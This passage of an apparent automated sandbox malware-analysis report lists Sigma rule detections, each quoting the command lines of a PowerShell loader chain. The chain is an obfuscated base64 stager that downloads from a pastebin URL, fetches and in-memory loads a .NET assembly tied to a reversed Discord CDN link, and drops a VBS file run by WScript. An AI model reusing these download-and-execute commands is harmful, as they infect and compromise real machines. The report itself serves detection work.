'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE
            Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\
            Sigma detected: PowerShell Base64 Encoded Invoke Keyword
            Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3460, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC
            Sigma detected: Suspicious Encoded PowerShell Command Line
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3460, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC
            Sigma detected: Suspicious Invoke-WebRequest Execution
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE
            Sigma detected: Suspicious PowerShell Encoded Command Patterns
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3460, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs", ProcessId: 1396, ProcessName: wscript.exe
            Sigma detected: PowerShell Web Download
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] 